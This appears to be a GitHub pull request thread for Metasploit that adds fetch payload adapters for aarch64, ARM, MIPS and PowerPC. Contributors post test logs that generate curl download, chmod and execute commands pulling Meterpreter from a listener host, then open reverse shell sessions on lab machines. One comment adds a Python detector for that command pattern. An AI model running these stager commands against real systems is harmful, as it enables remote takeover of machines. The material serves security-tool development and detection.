Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64 #19850

Open
wants to merge 7 commits into
base: master

bwatters-r7
Contributor

Adding several arch adapters to increase fetch payload coverage.
Please await testing.

@bwatters-r7
Contributor Author

bwatters-r7 commented Jan 30, 2025

AARCH64 STAGELESS

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > exit
[*] Shutting down session: 1

[*] 10.5.132.149 - Meterpreter session 1 closed.  Reason: User exit
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > use payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > generate -f raw
[-] Payload generation failed: One or more options failed to validate: LHOST.
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > generate -f raw
curl -sko /tmp/QmFuhTnL https://10.5.135.201:8080/d7GiQGdEoodZ84-t6UNmYg;chmod +x /tmp/QmFuhTnL;/tmp/QmFuhTnL&
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) >
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:60240) at 2025-01-30 15:24:27 -0600

msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > exit
[*] Shutting down session: 2

[*] 10.5.132.149 - Meterpreter session 2 closed.  Reason: Died
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > use payload/cmd/linux/tftp/aarch64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > generate -f raw
curl -so /tmp/syKtpABbG tftp://10.5.135.201:8080/rO0FgHU1uz_fQ-O3YyXWaA;chmod +x /tmp/syKtpABbG;/tmp/syKtpABbG&
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) >
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Meterpreter session 3 opened (10.5.135.201:4444 -> 10.5.132.149:39082) at 2025-01-30 15:25:19 -0600

msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux

EDIT (@dledda-r7)

AARCH64 STAGED

Using qemu-aarch64-static

msf6 payload(cmd/linux/http/aarch64/meterpreter/reverse_tcp) > generate -f
curl -so /tmp/iNqFqLGm http://172.26.133.223:8080/otevclxI8w0bUs3qv_y3Dw;chmod +x /tmp/iNqFqLGm;/tmp/iNqFqLGm&
msf6 payload(cmd/linux/http/aarch64/meterpreter/reverse_tcp) > 
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (953388 bytes) to 172.26.133.223
[*] Meterpreter session 4 opened (172.26.133.223:4444 -> 172.26.133.223:34684) at 2025-02-04 13:31:46 -0500

msf6 payload(cmd/linux/http/aarch64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer     : 172.26.133.223
OS           : Debian  (Linux 6.11.2-amd64)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > 

@bwatters-r7
Contributor Author

ARMEL

msf6 payload(cmd/linux/tftp/armle/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (10.5.135.201:4441 -> 10.5.134.124:51028) at 2025-01-30 16:42:37 -0600

msf6 payload(cmd/linux/tftp/armle/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : debian-armel.""
OS           : Debian 6.0.10 (Linux 2.6.32-5-versatile)
Architecture : armv5tejl
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > exit
[*] Shutting down session: 1


This system did not have cURL or TFTP

@bwatters-r7
Contributor Author

MIPSLE

msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > use payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set FETCH_COMMAND CURL
FETCH_COMMAND => CURL
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set FETCH_SRVPORT 8080
FETCH_SRVPORT => 8080
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set lport 4441
lport => 4441
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > generate -f raw
curl -so /tmp/NvpFcezafvU http://10.5.135.201:8080/rrP6zvtTemFbQhNqsbSjgA;chmod +x /tmp/NvpFcezafvU;/tmp/NvpFcezafvU&
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 16

[*] Started reverse TCP handler on 10.5.135.201:4441
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) >
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > use payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set FETCH_COMMAND CURL
FETCH_COMMAND => CURL
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set FETCH_SRVPORT 8081
FETCH_SRVPORT => 8081
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set lport 4442
lport => 4442
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > generate -f raw
curl -sko /tmp/pKTiqTdcSXX https://10.5.135.201:8081/YPmJ9swoEPYA_F8mtNz5pg;chmod +x /tmp/pKTiqTdcSXX;/tmp/pKTiqTdcSXX&
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 17
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) >
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > use payload/cmd/linux/tftp/mipsle/meterpreter_reverse_tcp
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set FETCH_SRVPORT 8082
FETCH_SRVPORT => 8082
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set FETCH_COMMAND CURL
FETCH_COMMAND => CURL
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set lport 4443
lport => 4443
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > generate -f raw
curl -so /tmp/LJUUbmrlBJ tftp://10.5.135.201:8082/NISRlXNmxW2uTHn_9QWATw;chmod +x /tmp/LJUUbmrlBJ;/tmp/LJUUbmrlBJ&
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 18

[*] Started reverse TCP handler on 10.5.135.201:4443
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > [*] Meterpreter session 4 opened (10.5.135.201:4441 -> 10.5.132.135:49706) at 2025-01-30 17:00:10 -0600
[*] Started reverse TCP handler on 10.5.135.201:4442
[*] Meterpreter session 5 opened (10.5.135.201:4442 -> 10.5.132.135:47960) at 2025-01-30 17:00:18 -0600
[*] Meterpreter session 6 opened (10.5.135.201:4443 -> 10.5.132.135:35328) at 2025-01-30 17:00:23 -0600

msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > sessions -l

Active sessions
===============

  Id  Name  Type                      Information         Connection
  --  ----  ----                      -----------         ----------
  4         meterpreter mipsle/linux  ubnt @ 192.168.1.1  10.5.135.201:4441 -> 10.5.132.135:49706 (10.5.132.135)
  5         meterpreter mipsle/linux  ubnt @ 192.168.1.1  10.5.135.201:4442 -> 10.5.132.135:47960 (10.5.132.135)
  6         meterpreter mipsle/linux  ubnt @ 192.168.1.1  10.5.135.201:4443 -> 10.5.132.135:35328 (10.5.132.135)

msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 4 (10.5.132.135)
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
[*] Running 'sysinfo' on meterpreter session 5 (10.5.132.135)
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
[*] Running 'sysinfo' on meterpreter session 6 (10.5.132.135)
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
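
For detection work, the `generate -f raw` output in the sessions above has one shape: curl writes to a path, `chmod +x` marks that path executable, and the same path is then run. The following is an added example, not code from this pull request or from Metasploit, that flags that sequence in process command-line telemetry; the function names and sample lines are constructed, and only the curl form shown in this thread is handled.

```python
import shlex
SEPARATORS = {";", "&", "&&", "||", "|"}
SCHEMES = ("http://", "https://", "tftp://")  # schemes seen in the session output

def split_commands(cmdline):
    """Tokenize like a POSIX shell and return one argv list per command."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split, lex.commenters = True, ""  # keep URLs/paths whole
    try:
        tokens = list(lex)
    except ValueError:  # unbalanced quotes: treat as unparseable
        return []
    commands = [[]]
    for tok in tokens:
        if tok in SEPARATORS:
            commands.append([])
        else:
            commands[-1].append(tok)
    return [c for c in commands if c]

def curl_download(argv):
    """Return (output_path, url, insecure) for 'curl ... -o PATH URL', else None."""
    if argv[0].rsplit("/", 1)[-1] != "curl":
        return None
    out, url, insecure = None, None, False
    for i, arg in enumerate(argv[1:], start=1):
        short = arg.startswith("-") and not arg.startswith("--")
        insecure = insecure or (short and "k" in arg)  # -k: no TLS cert check
        if short and arg.endswith("o") and i + 1 < len(argv):
            out = argv[i + 1]  # -o may be clustered, e.g. -so or -sko
        elif arg.lower().startswith(SCHEMES):
            url = arg
    return (out, url, insecure) if out and url else None

def find_fetch_exec(cmdline):
    """Flag download -> chmod +x -> execute of the same path in one command line."""
    fetched, executable = {}, set()
    for argv in split_commands(cmdline):
        dl = curl_download(argv)
        if dl:
            fetched[dl[0]] = dl
        elif argv[0] == "chmod" and len(argv) > 2 and "x" in argv[1]:
            executable.update(p for p in argv[2:] if p in fetched)  # symbolic modes only
        elif argv[0] in executable:
            return dict(zip(("path", "url", "insecure_tls"), fetched[argv[0]]))
    return None

# Constructed command lines (documentation address range, made-up file names).
SAMPLE_HIT = "curl -sko /tmp/AbCdEfGh https://192.0.2.10:8080/EXAMPLEuri;chmod +x /tmp/AbCdEfGh;/tmp/AbCdEfGh&"
SAMPLE_BENIGN = "curl -so /tmp/report.json http://192.0.2.10/report.json"
```

Matching on the download, chmod and execute steps sharing one path, rather than on the file name or URI, keeps the check independent of the random names that change on every `generate`.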

@jheysel-r7
Contributor

Hey @dledda-r7, as per our Slack discussion, I'm just linking this testing done by @h00die-gr3y, who found an issue when testing the staged versions of some of the newly supported architectures for fetch payloads.

#19841 (comment)

@bwatters-r7
Contributor Author

MIPSBE

msf6 payload(cmd/linux/http/mipsbe/meterpreter_reverse_tcp) > [*] Client 10.5.134.124 requested /KGrf3Ppw2f7d4FyPVpCzyQ
[*] Sending payload to 10.5.134.124 (Wget/1.12 (linux-gnu))
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.124:40302) at 2025-02-05 15:52:06 -0600

msf6 payload(cmd/linux/http/mipsbe/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : debian-mips.""
OS           : Debian 6.0.8 (Linux 2.6.32-5-4kc-malta)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid
Server username: root
meterpreter > 

@bwatters-r7
Contributor Author

Closes #19848

modules/payloads/adapters/cmd/linux/http/ppc.rb (outdated, resolved)
modules/payloads/adapters/cmd/linux/http/ppc64.rb (outdated, resolved)
modules/payloads/adapters/cmd/linux/https/ppc64.rb (outdated, resolved)
modules/payloads/adapters/cmd/linux/tftp/ppc.rb (outdated, resolved)
modules/payloads/adapters/cmd/linux/tftp/ppc64.rb (outdated, resolved)
@bwatters-r7 bwatters-r7 marked this pull request as ready for review February 11, 2025 13:49
Projects
Status: Todo
4 participants